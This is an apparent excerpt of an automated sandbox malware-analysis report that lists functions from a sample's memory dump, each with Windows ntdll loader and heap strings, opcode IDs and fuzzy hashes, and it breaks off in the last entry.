                                                                      Function 0198C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • @, xrefs: 0198C1F1
                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0198C1C5
                                                                      • PreferredUILanguages, xrefs: 0198C212
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                      • API String ID: 0-2968386058
                                                                      • Opcode ID: 73bfc5e02e1fd6fa04b2b47005090b896535af3bf90739481236e153e9c763ec
                                                                      • Instruction ID: 4066824424a35ed4d49be14cb4ae87c5de9a5f0751f4555421ab393ed8d7e7d5
                                                                      • Opcode Fuzzy Hash: 73bfc5e02e1fd6fa04b2b47005090b896535af3bf90739481236e153e9c763ec
                                                                      • Instruction Fuzzy Hash: E0416271A00219EBDF11EBD8C881FEEBBBCAB54701F14416AE60DE7280D774DA44CBA0
                                                                      Function 01964144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                      • API String ID: 0-1373925480
                                                                      • Opcode ID: a8a2394c4bbd4ef66a5cb098bebc69bf9d1803def4f68139c6d1a3338aee58ea
                                                                      • Instruction ID: 52732418901600b6bc29a08cb8a223d1d09ec359872b0fe93bdee1deaddfa6ae
                                                                      • Opcode Fuzzy Hash: a8a2394c4bbd4ef66a5cb098bebc69bf9d1803def4f68139c6d1a3338aee58ea
                                                                      • Instruction Fuzzy Hash: 5941E231A00258CBEB25DBD9C844BADBBFCFFA5340F25045AD909EB791D6359941CB21
                                                                      Function 01954755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • LdrpCheckRedirection, xrefs: 0195488F
                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01954888
                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01954899
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                      • API String ID: 0-3154609507
                                                                      • Opcode ID: 447e8d16bf077d76a1611317fb45138f1a6ae96e9e3b594d63e8515683e59803
                                                                      • Instruction ID: a0985b68e82bb2da3c2813e3a3b6268fad6079c51399c91cdfe9bad1997f1314
                                                                      • Opcode Fuzzy Hash: 447e8d16bf077d76a1611317fb45138f1a6ae96e9e3b594d63e8515683e59803
                                                                      • Instruction Fuzzy Hash: F641B232A047519FCBE1CF69D840A267BE8AF89651B050569EE8CF7311F730D880CB92
                                                                      Function 018E0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                      • API String ID: 0-2558761708
                                                                      • Opcode ID: 778a88f75fb2782a67b230cef194b96c582cc9409a6cf0e2808c33bff01ede84
                                                                      • Instruction ID: e2acade82f70848f3018e0414995df139612fd3645510d949ea5c72c6022519e
                                                                      • Opcode Fuzzy Hash: 778a88f75fb2782a67b230cef194b96c582cc9409a6cf0e2808c33bff01ede84
                                                                      • Instruction Fuzzy Hash: CF11F0303181068FEB29CA18C489B76B3A8EFC1B16F19841DF00ACB251D770D981C741
                                                                      Function 019520DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • Process initialization failed with status 0x%08lx, xrefs: 019520F3
                                                                      • LdrpInitializationFailure, xrefs: 019520FA
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01952104
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 0-2986994758
                                                                      • Opcode ID: 45e9e39929553f718446eb1e0482493a25b6cb09417ffbd2abcad2f7e79a7cd3
                                                                      • Instruction ID: 986170541b0602227da5111aeb27c61a39edd697e9bea1a21efb11634163de83
                                                                      • Opcode Fuzzy Hash: 45e9e39929553f718446eb1e0482493a25b6cb09417ffbd2abcad2f7e79a7cd3
                                                                      • Instruction Fuzzy Hash: B1F0AF75640208ABE724E64DDC86FEA3768FB80B54F540059FA48BB385D2A4AA40CB91
                                                                      Function 018E03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: #%u
                                                                      • API String ID: 48624451-232158463
                                                                      • Opcode ID: a015bcd45e831222f5103dc85be5337435e842096acf671c692a11f340123b53
                                                                      • Instruction ID: cf2eec93081505ddc4523058184fee28ead96b5eaabd49eb43cc104b53817526
                                                                      • Opcode Fuzzy Hash: a015bcd45e831222f5103dc85be5337435e842096acf671c692a11f340123b53
                                                                      • Instruction Fuzzy Hash: 4E714C71A0014A9FDB11DFA8C994BAEB7F8FF48704F154065E905E7251EB38EE41CB61
                                                                      Function 018DA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • LdrResSearchResource Enter, xrefs: 018DAA13
                                                                      • LdrResSearchResource Exit, xrefs: 018DAA25
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                      • API String ID: 0-4066393604
                                                                      • Opcode ID: b7363de9ec54f6cc816e4fb806f678fa83fbb311a2d0225dae881c67ee84a158
                                                                      • Instruction ID: 735b4eec83bdc0c9fa4ee32fceea4aff1a1e3d87c4b3852494336dbd3fcb90cc
                                                                      • Opcode Fuzzy Hash: b7363de9ec54f6cc816e4fb806f678fa83fbb311a2d0225dae881c67ee84a158
                                                                      • Instruction Fuzzy Hash: F5E1AF71E00309AFEB26CFA9C980BAEBBB9FF84314F204526E905E7251D774DA41CB51
                                                                      Function 0199A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `$`
                                                                      • API String ID: 0-197956300
                                                                      • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                      • Instruction ID: 45323edf6542e4ecd0fbbc9eef610fb99a431222253d0b2bd83391694157f151
                                                                      • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                      • Instruction Fuzzy Hash: DAC1D1312043469BEB25CF2CC845B2BBBE9EFD4719F184A2CF69A87290D774D545CB82
                                                                      Function 0194E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: Legacy$UEFI
                                                                      • API String ID: 2994545307-634100481
                                                                      • Opcode ID: c9c61289ea2720a001a474f4aa64a381933798a91dd6ecc26f39e832472d3536
                                                                      • Instruction ID: 71c2a8d784025ebf51ed356507eb51b1279466b34ac12c27a10a163933ab2927
                                                                      • Opcode Fuzzy Hash: c9c61289ea2720a001a474f4aa64a381933798a91dd6ecc26f39e832472d3536
                                                                      • Instruction Fuzzy Hash: 56614B71E002199FEB15DFA8C890FAEBBB9FB48700F14446DE649EB351E735A940CB51
                                                                      Function 019743D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$MUI
                                                                      • API String ID: 0-17815947
                                                                      • Opcode ID: e0c70b0eb7ab96bdb896a4885f8623657414d1e0cf9c5a41cd61769352008d99
                                                                      • Instruction ID: 9ab688fd943537ca54a045e440727beda5b8ea5cad84a0e3a899eb1796998a84
                                                                      • Opcode Fuzzy Hash: e0c70b0eb7ab96bdb896a4885f8623657414d1e0cf9c5a41cd61769352008d99
                                                                      • Instruction Fuzzy Hash: 9E51F871E0021DAEDB11DFA9CC90AEEBBBDEF44B54F100529E615BB291D7309E45CB60
                                                                      Function 018D04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • kLsE, xrefs: 018D0540
                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 018D063D
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                      • API String ID: 0-2547482624
                                                                      • Opcode ID: 837179355232119972e21690efa429e8e13f9ec5f2430ea80ace0cd7d6789e95
                                                                      • Instruction ID: 6c72df11162680cec742502b886c1f799d13d556e8b0a51343293407256c0c12
                                                                      • Opcode Fuzzy Hash: 837179355232119972e21690efa429e8e13f9ec5f2430ea80ace0cd7d6789e95
                                                                      • Instruction Fuzzy Hash: 0351CE716047468FD724EF68D5846A7BBE4AF84314F10883EFAEAC7241E770E645CB92
                                                                      Function 018DA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 018DA2FB
                                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 018DA309
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                      • API String ID: 0-2876891731
                                                                      • Opcode ID: c86a8b4ec4970b8df986e620edecb8baffb7f57f8f828056ac596dcd705450da
                                                                      • Instruction ID: c7ac899854454804d840c826fa8378bea06c778c00965e081d4a3ca5df04e548
                                                                      • Opcode Fuzzy Hash: c86a8b4ec4970b8df986e620edecb8baffb7f57f8f828056ac596dcd705450da
                                                                      • Instruction Fuzzy Hash: 31419D31A04749DBEB1DCF5DC840B6ABBB9FF86704F2440A9E904DB291EBB5DA40CB51
                                                                      Function 0190A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: Cleanup Group$Threadpool!
                                                                      • API String ID: 2994545307-4008356553
                                                                      • Opcode ID: d1c155771f3fc57927da30a0f6e4f64e308761c19eb8f9a1534197260a0bc3bf
                                                                      • Instruction ID: 2380c704561ea3e13d7a6ae4c3865f0d51375a32fe5da158d4ec9d0378700f90
                                                                      • Opcode Fuzzy Hash: d1c155771f3fc57927da30a0f6e4f64e308761c19eb8f9a1534197260a0bc3bf
                                                                      • Instruction Fuzzy Hash: 0401D1B2244704AFE312DF14CE45F2677F8EB85B15F048939A64CCB690E334D944CB86
                                                                      Function 018DC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: MUI
                                                                      • API String ID: 0-1339004836
                                                                      • Opcode ID: 2b1d8a9103bb775594c8eab303511e77698c37ec5fa241c33b012726569059ec
                                                                      • Instruction ID: 577a972d664dbdaf8f5d2704b83f5ea416c8b51095cc14e3094a875d91dcff37
                                                                      • Opcode Fuzzy Hash: 2b1d8a9103bb775594c8eab303511e77698c37ec5fa241c33b012726569059ec
                                                                      • Instruction Fuzzy Hash: 67824B75E003199FEB25CFA9C880BEDBBB1BF48314F148169E959EB291DB309E41CB50
                                                                      Function 01956420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID: 0-3916222277
                                                                      • Opcode ID: 47ca1bd2ffd71227982c23cd3b97162d19c002e8949b8d7404c75f2ef9f8fb1f
                                                                      • Instruction ID: 1b297a7f440b97df0c86ee3ca7221e555e179b682d8b0ad19391488357a29427
                                                                      • Opcode Fuzzy Hash: 47ca1bd2ffd71227982c23cd3b97162d19c002e8949b8d7404c75f2ef9f8fb1f
                                                                      • Instruction Fuzzy Hash: C6917272941219AFEB21DF99CC85FAE7BB8EF15B50F500069FB05BB190D674AD00CBA1
                                                                      Function 0197E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID: 0-3916222277
                                                                      • Opcode ID: b772f2933e73e6c89d4c918ca1ef624a92757f882e73c056c102f37a6d1a22ad
                                                                      • Instruction ID: a9d3838be77cd802f1f05496f38b618cbcbf235f5f25c066e59d46329364d283
                                                                      • Opcode Fuzzy Hash: b772f2933e73e6c89d4c918ca1ef624a92757f882e73c056c102f37a6d1a22ad
                                                                      • Instruction Fuzzy Hash: C9918E72900609BFDB22EBA9DC44FAFBBBDEF85750F100069F609A7250DB749941CB91
                                                                      Function 0190A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: GlobalTags
                                                                      • API String ID: 0-1106856819
                                                                      • Opcode ID: 933d19765c801b39815c5b33533015932f665a0b963ce62b35f8aa3864146e15
                                                                      • Instruction ID: 9cebed88ca436c7c99c9bd3ccb8ef8dc38ea4768e47073c3c146c7a3c13725c2
                                                                      • Opcode Fuzzy Hash: 933d19765c801b39815c5b33533015932f665a0b963ce62b35f8aa3864146e15
                                                                      • Instruction Fuzzy Hash: F7717DB5E0030A8FEF28CF9CC590AADBBB5BF89711F14852EE909A7341E7319941CB50
                                                                      Function 01974978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .mui
                                                                      • API String ID: 0-1199573805
                                                                      • Opcode ID: 2e0c554bc9d616af98b0381930b4ec8abe2d2c4adad65596a81b610e644d3164
                                                                      • Instruction ID: 15bed1d2df471d820753a55968296d0206f0e39ae3272bcb632e9e29290fabb9
                                                                      • Opcode Fuzzy Hash: 2e0c554bc9d616af98b0381930b4ec8abe2d2c4adad65596a81b610e644d3164
                                                                      • Instruction Fuzzy Hash: B051B372D4022A9BDF15EF99D840ABEBBB8EF04B10F054169EA19FB251D7349D01CBE4
                                                                      Function 018EE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: EXT-
                                                                      • API String ID: 0-1948896318
                                                                      • Opcode ID: 8c1e432b422084266c3d61ada7557fd8fc2af716c8b95dcd62391a746f95ab49
                                                                      • Instruction ID: 0893c4ff639a8268b806d6f6f3b4b286d516b1e0671449d65622d26cfa1907e9
                                                                      • Opcode Fuzzy Hash: 8c1e432b422084266c3d61ada7557fd8fc2af716c8b95dcd62391a746f95ab49
                                                                      • Instruction Fuzzy Hash: 9741B3725483129BD710DA79DC88B6BBBD8AF89718F44092DFA84D7140E774DB04C797
                                                                      Function 0194C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: BinaryHash
                                                                      • API String ID: 0-2202222882
                                                                      • Opcode ID: 4f34706da3f4eb1e69d12d47b4757993eff73b1a8bc138b94f49559fdc38a117
                                                                      • Instruction ID: c2c1c9e2e957652e4d01405bf583e6b6fb07c4fbd158ba440e4a2004ccdd2f6e
                                                                      • Opcode Fuzzy Hash: 4f34706da3f4eb1e69d12d47b4757993eff73b1a8bc138b94f49559fdc38a117
                                                                      • Instruction Fuzzy Hash: 0D4122B1D0152DAFDB21DA50CC84FDEB77CAB55714F0045A5AB0CAB240DB709E898FA5
                                                                      Function 019507C3 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: t+P
                                                                      • API String ID: 0-1706847591
                                                                      • Opcode ID: ae047d4992b4fe2af6ebe782cb0cb7f27e102ed9faf329d1f74298ab4c49e14b
                                                                      • Instruction ID: c9ff4c7ba98293017c32f67b5f9d4bdbdedcedfe8d4fbd1da1872ce676b8e529
                                                                      • Opcode Fuzzy Hash: ae047d4992b4fe2af6ebe782cb0cb7f27e102ed9faf329d1f74298ab4c49e14b
                                                                      • Instruction Fuzzy Hash: BF4169729083459FD360DF29C845B9BBBE8FF88754F104A2EFA98D7250D7709944CB92
                                                                      Function 01966B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #
                                                                      • API String ID: 0-1885708031
                                                                      • Opcode ID: c6aad5b35a4110fc84ad1aafce1f739c7962d9e1cb4d46be845e72ec8746119b
                                                                      • Instruction ID: 3bae128a4511a6ab1d354c0a86a9d9b29fabba17d51cfdf233301eaa93ec9eb8
                                                                      • Opcode Fuzzy Hash: c6aad5b35a4110fc84ad1aafce1f739c7962d9e1cb4d46be845e72ec8746119b
                                                                      • Instruction Fuzzy Hash: 14312C31E00B099FEB22CB6DC850BEE7BBCDF45704F144028EA49AB285D779D945CBA0
                                                                      Function 0194CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: BinaryName
                                                                      • API String ID: 0-215506332
                                                                      • Opcode ID: 2b2fbd26880681a4a8db72729d0b94af6a87913a43488ee1e37829e223096131
                                                                      • Instruction ID: 5b3fd1134007aaac86047a546bea5c367750afe8500aee98b42de6df933fe701
                                                                      • Opcode Fuzzy Hash: 2b2fbd26880681a4a8db72729d0b94af6a87913a43488ee1e37829e223096131
                                                                      • Instruction Fuzzy Hash: F431393690251AAFEB16DB5DC845E7FBB78EF80750F114129E909A7250D730EE04D7E0
                                                                      Function 0195892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0195895E
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                      • API String ID: 0-702105204
                                                                      • Opcode ID: 181c8729a00590bc7fd31cbadf28556888fe1bb290fd70909894421d360226e1
                                                                      • Instruction ID: 083ce9a4581ab433bf219ed8715b7df34ad796c73d73b5533a2a3127a57914fe
                                                                      • Opcode Fuzzy Hash: 181c8729a00590bc7fd31cbadf28556888fe1bb290fd70909894421d360226e1
                                                                      • Instruction Fuzzy Hash: DA01F735300311AFF760DB5B9C94A66BBBAEFC57A5B04041CFA8966252CB20AC41C793
                                                                      Function 01972000 Relevance: .8, Instructions: 757COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 077c16a6b428d46b3e857b6fd8134a79b511835528b22ef7a00b11ecef9dcf10
                                                                      • Instruction ID: 4b3568641c967d13c87579071984976d73bdd09f6e51c7aa80db1af4d1ed479e
                                                                      • Opcode Fuzzy Hash: 077c16a6b428d46b3e857b6fd8134a79b511835528b22ef7a00b11ecef9dcf10
                                                                      • Instruction Fuzzy Hash: 3142D4316283419FE725CF68C890A6FBBE9BFC8700F08492DFA8A97251D771D945CB52
                                                                      Function 01968158 Relevance: .6, Instructions: 617COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e2ee59168255926bb6a7bcd87796c503b511a6b3cf1110c9f3d0c821c887efaf
                                                                      • Instruction ID: 1138694d5d97f4078dba62e0241a9c6ebc1c8d0e79f109adeb2c1f9c8c992994
                                                                      • Opcode Fuzzy Hash: e2ee59168255926bb6a7bcd87796c503b511a6b3cf1110c9f3d0c821c887efaf
                                                                      • Instruction Fuzzy Hash: 0A424B75A003199FEB25CF69C881BADBBF9BF88301F148099E94DEB241D7349985CF61
                                                                      Function 018E2840 Relevance: .6, Instructions: 605COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 831bf671ed26d3038e138eef36cc765b7b1b7c18b242909d2cf6226d30df7621
                                                                      • Instruction ID: 7b89680b463b01e9061871f19e73010ee33e41f30d49da3d0144759af8c0a483
                                                                      • Opcode Fuzzy Hash: 831bf671ed26d3038e138eef36cc765b7b1b7c18b242909d2cf6226d30df7621
                                                                      • Instruction Fuzzy Hash: 02321170A00719AFDB25CF69C848BBEBBF6BFC5704F24451DD58A9B284D735AA02CB50
                                                                      Function 0197A118 Relevance: .6, Instructions: 591COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2c8dcd76cd92a6d66c21088ef2aa1cfbd891ec3e0965a381aa00b51e187ed74c
                                                                      • Instruction ID: a8651034ebcbeede6305b8a661cc34bb9266117f6b97e2ee683c450b5878ea32
